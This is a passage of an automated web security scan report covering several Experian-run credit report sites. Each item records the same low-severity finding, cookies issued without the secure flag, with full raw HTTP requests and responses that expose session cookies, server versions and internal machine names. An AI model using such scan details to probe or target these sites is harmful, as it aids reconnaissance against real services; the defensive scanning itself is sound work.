X-PvInfo: [S10202.C94085.A70594.RA70541.G11457.U58DF84F2].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 65890

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expimnicrlive, expiglobal"

var s=s_g
...[SNIP]...

11.96. https://www.creditreport.com/dni/time-out.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /dni/time-out.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/time-out.aspx HTTP/1.1
Host: www.creditreport.com
Connection: keep-alive
Referer: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox=session#1303691695619-486775#1303693798|PC#1303691695619-486775.17#1304901538|check#true#1303691998; mbox-experianuk=session#1303691695624-816974#1303693799|check#true#1303691998; mbox-experian=session#1303691695628-869024#1303693799|check#true#1303691999; mbox-protectmyidcom=session#1303691695631-207802#1303693799|check#true#1303691999; s_pers=%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20s_lv%3D1303691939108%7C1398299939108%3B%20s_lv_s%3DFirst%2520Visit%7C1303693739108%3B%20sc_dl%3D1%7C1303693739214%3B%20gpv_p50%3Dhttps%253A%252F%252Fwww.creditreport.com%252Fdni%252FOrder1.aspx%253Fareaid%253D22%2526pkgid%253DC2TDM%2526SiteVersionID%253D967%2526SiteID%253D100332%2526sc%253D671917%2526bcd%253Dcomptst%7C1303693739223%3B%20gpv_PN%3D100332%253Adni%253Aorder1.aspx%7C1303693739231%3B; s_sess=%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20s_cc%3Dtrue%3B%20sc_cp_channel%3D0%3B%20sc_cp_paid%3D0%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20SC_LINKS%3D%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Aorder1.aspx%252526pidt%25253D1%252526oid%25253Dfunctiononclick(event)%2525257BtoggleDisplay('previousAddress_tblTogglePreviousAddress'%2525252Cfalse)%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditreport.com/dni; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: MachineName=IRC-P2WEB-34; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavigationPath=Order1+Error+Order1+Error+Order1+time-out; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 6:36:22 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: UID=2a0ea07e078d45acbe75184e6bfdf00f; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:36:22 GMT
ETag: "pvfb53f30d38bdcd61e442d0aa9c8449f1"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.U263B78D6].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 9883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>
           CreditReport.com | Credit Report and Credit Score Online by Exper
...[SNIP]...

11.97. https://www.experiandirect.com/TRIPLEALERT/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.experiandirect.com
Path:   /TRIPLEALERT/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TRIPLEALERT/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx HTTP/1.1
Host: www.experiandirect.com
Connection: keep-alive
Referer: https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=668715&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NavFlowID=; NumTrialDaysLeft=; OriginalReferrer=experiandirect.com/triplealert; MachineName=IRC-P2WEB-16; NavigationPath=default+s_code.axd+Order1; LastVisitDate=4/24/2011 12:49:23 PM; UID=8c28239441c74e2395ab5003d18798d0; ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=coygyj55nspn2hy5hekqo5bx; s_pers=%20s_lv%3D1303674402594%7C1398282402594%3B%20s_lv_s%3DFirst%2520Visit%7C1303676202594%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20sc_dl%3D1%7C1303676372831%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252Fdefault.aspx%253Fsc%253D668715%7C1303676372835%3B%20gpv_PN%3D100173%253Atriplealert%253Adefault.aspx%7C1303676372837%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_gvl_sc%3D668715%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20SC_LINKS%3D100173%253Atriplealert%253Adefault.aspx%255E%255E%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E100173%253Atriplealert%253Adefault.aspx%2520%257C%2520%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.experiandirect.com%2525252Ftriplealert%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DBCZ1Y%25252526SiteVersionID%2525253D473%25252526Sit_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:49:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: NavigationPath=default+s_code.axd+Order1+s_code.axd+ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: LastVisitDate=4/24/2011 12:49:27 PM; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Cache-Control: public
Last-Modified: Sun, 24 Apr 2011 19:49:27 GMT
ETag: e39efd15dfddf96518fda29573493237
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 875

if(typeof ECD == "undefined") ECD={};
if(typeof ECD.Web == "undefined") ECD.Web={};
if(typeof ECD.Web.WebProcesses == "undefined") ECD.Web.WebProcesses={};
if(typeof ECD.Web.WebProcesses.bpSubmit =
...[SNIP]...

11.98. https://www.experiandirect.com/triplealert/Message.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.experiandirect.com
Path:   /triplealert/Message.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /triplealert/Message.aspx?PageTypeID=SessionTimeOut HTTP/1.1
Host: www.experiandirect.com
Connection: keep-alive
Referer: https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=668715&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=coygyj55nspn2hy5hekqo5bx; s_pers=%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20s_lv%3D1303674590959%7C1398282590959%3B%20s_lv_s%3DFirst%2520Visit%7C1303676390959%3B%20sc_dl%3D1%7C1303676391021%3B%20gpv_p50%3Dhttps%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252FOrder1.aspx%253Fareaid%253D22%2526pkgid%253DBCZ1Y%2526SiteVersionID%253D473%2526SiteID%253D100173%2526sc%253D668715%2526bcd%253D%7C1303676391080%3B%20gpv_PN%3D100173%253Atriplealert%253Aorder1.aspx%7C1303676391140%3B; s_sess=%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20sc_cp_channel%3D0%3B%20s_cc%3Dtrue%3B%20sc_gvl_sc%3D668715%3B%20sc_gvl_bcd%3D0%3B%20SC_LINKS%3D%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Aorder1.aspx%252526pidt%25253D1%252526oid%25253Dfunctiononclick(event)%2525257BtoggleDisplay('previousAddress_tblTogglePreviousAddress'%2525252Cfalse)%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:27:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: OriginalReferrer=experiandirect.com/triplealert; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: MachineName=IRC-P2WEB-16; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NavigationPath=Message?PageTypeID=SessionTimeOut+s_code.axd+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Message?PageTypeID=SessionTimeOut; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: LastVisitDate=4/24/2011 1:27:29 PM; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: UID=f7dcb47c1df0490c9c9543b65f582e1a; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 10179

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           TripleAlert.com
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <meta nam
...[SNIP]...

11.99. https://www.experiandirect.com/triplealert/Order1.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.experiandirect.com
Path:   /triplealert/Order1.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=657900&bcd= HTTP/1.1
Host: www.experiandirect.com
Connection: keep-alive
Referer: https://www.experiandirect.com/triplealert/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=cdcegvypn3iopdndfus34r45; s_pers=%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20s_lv%3D1303676208988%7C1398284208988%3B%20s_lv_s%3DFirst%2520Visit%7C1303678008988%3B%20sc_dl%3D1%7C1303678023924%3B%20gpv_p50%3Dhttps%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252Fdefault.aspx%7C1303678023929%3B%20gpv_PN%3D100173%253Atriplealert%253Adefault.aspx%7C1303678023932%3B; s_sess=%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20sc_cp_channel%3D0%3B%20s_cc%3Dtrue%3B%20sc_gvl_sc%3D657900%3B%20sc_gvl_bcd%3D0%3B%20SC_LINKS%3D100173%253Atriplealert%253Adefault.aspx%255E%255E%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E100173%253Atriplealert%253Adefault.aspx%2520%257C%2520%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.experiandirect.com%2525252Ftriplealert%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DBCZ1Y%25252526SiteVersionID%2525253D473%25252526Si_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:16:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: OriginalReferrer=experiandirect.com/triplealert; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: MachineName=IRC-P2WEB-16; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NavigationPath=default+s_code.axd+Order1; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: LastVisitDate=4/24/2011 1:16:52 PM; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: UID=b9e50f6aa22f42ca81c3b1ebd91be07d; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24705

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           TripleAlert.com
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <meta nam
...[SNIP]...

11.100. https://www.experiandirect.com/triplealert/javascripts/s_code.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.experiandirect.com
Path:   /triplealert/javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /triplealert/javascripts/s_code.axd HTTP/1.1
Host: www.experiandirect.com
Connection: keep-alive
Referer: https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=668715&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=coygyj55nspn2hy5hekqo5bx; s_pers=%20s_lv%3D1303674402594%7C1398282402594%3B%20s_lv_s%3DFirst%2520Visit%7C1303676202594%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20sc_dl%3D1%7C1303676372831%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252Fdefault.aspx%253Fsc%253D668715%7C1303676372835%3B%20gpv_PN%3D100173%253Atriplealert%253Adefault.aspx%7C1303676372837%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_gvl_sc%3D668715%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20SC_LINKS%3D100173%253Atriplealert%253Adefault.aspx%255E%255E%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E100173%253Atriplealert%253Adefault.aspx%2520%257C%2520%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.experiandirect.com%2525252Ftriplealert%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DBCZ1Y%25252526SiteVersionID%2525253D473%25252526Sit_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 65895
Content-Type: text/javascript; charset=utf-8
Expires: Mon, 01 Jan 0001 00:00:00 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
Set-Cookie: OriginalReferrer=experiandirect.com/triplealert; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: MachineName=IRC-P2WEB-16; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NavigationPath=default+s_code.axd+Order1+s_code.axd; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: LastVisitDate=4/24/2011 12:49:26 PM; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: UID=76824b8ebe2b417d872294f2bff9ea80; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 19:49:26 GMT

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expiglobal,expitriplealertlive"

var
...[SNIP]...

11.101. https://www.freecreditscore.com/dni/javascripts/s_code.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.freecreditscore.com
Path:   /dni/javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/javascripts/s_code.axd HTTP/1.1
Host: www.freecreditscore.com
Connection: keep-alive
Referer: https://www.freecreditscore.com/dni/sign-in.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=dfa29d439e60422e86d8462241524cd1; NavFlowID=; NumTrialDaysLeft=; MachineName=IRC-P2WEB-06; OriginalReferrer=freecreditscore.com/dni; NavigationPath=default+sign-in; LastVisitDate=4/24/2011 5:36:50 PM; ASP.NET_SessionId=i5yzufy4tzcjwrnuuk1t5nf0; BIGipServerfreecreditscore-web-pool=174738954.19999.0000; mbox=check#true#1303691762|session#1303691701600-906378#1303693562|PC#1303691701600-906378.17#1304901306; s_pers=%20s_lv%3D1303691711968%7C1398299711968%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303693511968%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691711994'%255D%255D%7C1461544511994%3B%20sc_cidstack%3D%255B%255B'671212'%252C'1303691711997'%255D%255D%7C1461544511997%3B%20sc_dl%3D1%7C1303693619401%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.freecreditscore.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage11%2526SiteVersionID%253D932%2526SiteID%253D100323%2526sc%253D671212%2526bcd%253D%7C1303693619408%3B%20gpv_PN%3D100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%7C1303693619411%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20ttc%3D1303691818740%3B%20sc_gvl_sc%3D671212%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined671212undefined%3B%20SC_LINKS%3D100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%255E%255EMember%2520Sign-in%255E%255E100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%2520%257C%2520Member%2520Sign-in%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpifcslive%253D%252526pid%25253D100323%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage11%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.freecreditscore.com%2525252Fdni%2525252Fsign-in_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+sign-in+s_code.axd; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: LastVisitDate=4/24/2011 5:36:53 PM; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
X-Powered-By: ASP.NET
Content-Type: text/javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:36:53 GMT
ETag: "pv13b9cf18ec41e1ccfc351a45220c652a"
Expires: Wed, 27 Apr 2011 00:36:53 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C70872.A70594.RA70541.G11457.UF483C3F].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 65887

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expiglobal,expifcslive"

var s=s_gi(s
...[SNIP]...

11.102. https://www.freecreditscore.com/dni/sign-in.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.freecreditscore.com
Path:   /dni/sign-in.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/sign-in.aspx HTTP/1.1
Host: www.freecreditscore.com
Connection: keep-alive
Referer: http://www.freecreditscore.com/dni/default.aspx?PageTypeID=HomePage11&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=dfa29d439e60422e86d8462241524cd1; OriginalReferrer=; NavFlowID=; NumTrialDaysLeft=; MachineName=IRC-P2WEB-06; NavigationPath=default; LastVisitDate=4/24/2011 5:34:46 PM; ASP.NET_SessionId=i5yzufy4tzcjwrnuuk1t5nf0; BIGipServerfreecreditscore-web-pool=174738954.19999.0000; mbox=check#true#1303691762|session#1303691701600-906378#1303693562|PC#1303691701600-906378.17#1304901306; s_pers=%20s_lv%3D1303691711968%7C1398299711968%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303693511968%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691711994'%255D%255D%7C1461544511994%3B%20sc_cidstack%3D%255B%255B'671212'%252C'1303691711997'%255D%255D%7C1461544511997%3B%20sc_dl%3D1%7C1303693619401%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.freecreditscore.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage11%2526SiteVersionID%253D932%2526SiteID%253D100323%2526sc%253D671212%2526bcd%253D%7C1303693619408%3B%20gpv_PN%3D100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%7C1303693619411%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20ttc%3D1303691818740%3B%20sc_gvl_sc%3D671212%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined671212undefined%3B%20SC_LINKS%3D100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%255E%255EMember%2520Sign-in%255E%255E100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%2520%257C%2520Member%2520Sign-in%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpifcslive%253D%252526pid%25253D100323%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage11%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.freecreditscore.com%2525252Fdni%2525252Fsign-in_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=freecreditscore.com/dni; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: NavigationPath=default+sign-in; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: LastVisitDate=4/24/2011 6:25:26 PM; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:25:26 GMT
